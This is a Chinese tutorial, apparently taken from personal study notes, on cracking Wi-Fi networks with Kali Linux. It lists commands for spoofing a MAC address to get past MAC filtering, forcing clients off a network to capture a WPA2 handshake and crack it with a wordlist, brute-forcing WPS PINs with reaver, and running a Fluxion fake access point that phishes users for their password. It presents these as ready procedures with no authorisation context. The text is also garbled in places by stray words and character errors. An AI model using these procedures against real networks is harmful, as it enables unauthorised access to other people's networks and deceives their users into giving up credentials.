本文但愿能够帮助到想要学习接触此方面、或兴趣使然的你,让你有个大概的印象. 文中可能存在错误操做或错误理解,望你们不吝指正.
!阅前须知!
本文是基于我几年前的一本笔记本,上面记录了我学习网络基础时的部分笔记
本文中的工具可能已通过时,或者使用方法已经改变了,感兴趣能够深刻查阅资料.
(可是我仍是列出之前的使用方法供你们借鉴).html
ps.若对无线攻击手段与ARP欺骗感兴趣能够参考如下两篇文章
【无线安全实践入门】基础攻击手段与经常使用工具简介
【无线安全实践入门】网络扫描和ARP欺骗linux
ps.
本文环境在Kali下,学习最好具有一点linux基础知识.
本文中的'混杂模式'并非全部网卡都支持,详请搜索支持网卡型号.
本文第一节和第二节的方法受限于硬件配置等因素,破解时间过长也是合理的.
web
很是优秀的无线网络分析套件,功能强大.
许多安全软件套件都默认(添加/调用)此套件来完成操做.浏览器
--首先,先要切换到可以支持'混杂模式'的网卡(通常都是购买USB无线网卡) --开启混杂模式(开启以后,网卡名可能会改变) > ifconfig (网卡名) down > iwconfig (网卡名) mode monitor > ifconfig (网卡名) up
1.1.链接MAC地址绑定的wifi安全
--查看附件网络中的wifi,并观察其详细信息(channel、BSSID(MAC)等) > airodump-ng (网卡名) --得知详细信息后,能够中止查看(ctrl+c) --开始拿有效的mac地址信息(尽可能等久点,包多点) > airodump-ng -c (信道channel) --bssid (BSSID(MAC) (网卡名) --拿到有效mac地址(不要拿到路由器的mac) --修改本机mac > ifconfig (网卡名) down > macchanger -m (MAC地址) (网卡名) > ifconfig (网卡名) up --注意,此方法拿到有效mac地址,并未拿到wifi密码
1.2.WPA2加密的wifi网络
--查看附件网络中的wifi,并观察其详细信息(channel、BSSID(MAC)等) > airodump-ng (网卡名) --得知详细信息后,能够中止查看(ctrl+c) --开始进行查看route与client的mac地址,[-w]选项的意思就是write > airodump-ng -w wpa -c (信道channel) --bssid (BSSID(MAC) (网卡名) --ignore-negative-one --查看route与client的mac地址 --开始得到握手包.cap > airoplay-ng --deauth 10 -a (route的mac) -c (client的mac) (网卡名) --ignore-negative-one --对握手包.cap进行破解 aircrack-ng -w (指定字典) (cap握手包名) --字典能够本身制做(Crunch工具),也能够在网上下载大神的字典 --一个NB的字典,对你的破解!事半功倍!
1.3.WEP加密的wifi工具
--因为这种加密基本已经舍弃了,因此就不说了
经过输入PIN码来链接wifi也是能够的,PIN码的破解也是一种不错的方法.
常见的工具备reaver、minidwep-gtk等工具,这里我就说下reaver工具.学习
--首先,先要切换到可以支持'混杂模式'的网卡(通常都是购买USB无线网卡) --开启混杂模式(开启以后,网卡名可能会改变) > ifconfig (网卡名) down > iwconfig (网卡名) mode monitor > ifconfig (网卡名) up --选作:能够尝试扫描是否有启用WPS的wifi --Wash工具就是一款针对'判断wifi是否启用WPS'的工具 --查看附件网络中的wifi,并观察PWR值小于70的来破解(记录BSSID,记住要是路由器的) > airodump-ng (网卡名) --开始进行破解(注意是路由器的MAC地址,PIN码是针对路由器的) > reaver -i (网卡名) -b (路由器MAC地址) -a -S -vv --1.若是出现 warning fail to associate ... --则说明破解失败(失败缘由包括对象路由器未开启WPS等) --2.提示给出了 PIN码 或 PIN码和PSK密钥(wifi密码) --则说明破解成功(记录PIN码)/(使用PSK密钥直接尝试链接wifi) --选作:能够尝试获得wifi密码(PIN码是能够连wifi) reaver -i (网卡名) -b (路由器MAC地址) -p (刚获得的PIN码)
一个很是不错的社工破解wifi神器.加密
与前面操做思路不一样.
它是经过模拟原有wifi(FakeAP),用户进行链接
而后wifi会断开网络,并向链接用户发送请求(浏览器跳转页面),请求输入原wifi密码
用户在收到请求后,只需输入正确密码,wifi就会恢复网络,而你得到wifi密码
注意,Fluxion会自动判断wifi密码是否正确,从而作出下一步操做
ps.此方法的好处就是不用耗费资源去破解密码.code
ps.Fluxion运行时须要调用许多其它工具,部分工具可能须要另行下载(运行时会提示有哪些未下载)
--运行软件(在软件目录下) > ./fluxion > 网卡(选择网卡) > channels(选择全部信道) > 扫描wifi(扫描到须要的结果时,按ctrl+c) > 选择wifi(输入一、二、3等选择) --创建一个假AP > 选择攻击方式(选FakeAP-Hostapd...) > 选择保存路径(可空格跳过,则保存在桌面/root/Desktop/) --会自动出现窗口 > 握手包选择(aircrack-ng...) --抓包分配包 > 数据包分配(Deauth all) --如果以上步骤正确完成,等抓包抓完,会出现选择 > 选择web interface > 选择语言(提示用户输入密码时的界面语言) --等待用户链接上网,在浏览器输入正确密码(工具会自动验证密码是否正确),工具就会自动中止 --得到wifi正确密码
破解wifi能够说是比较有意思、而且有挑战性的一块知识点了,
更多的无线攻防操做,其实都是创建在连入局域网的前提之下的.
加油,共勉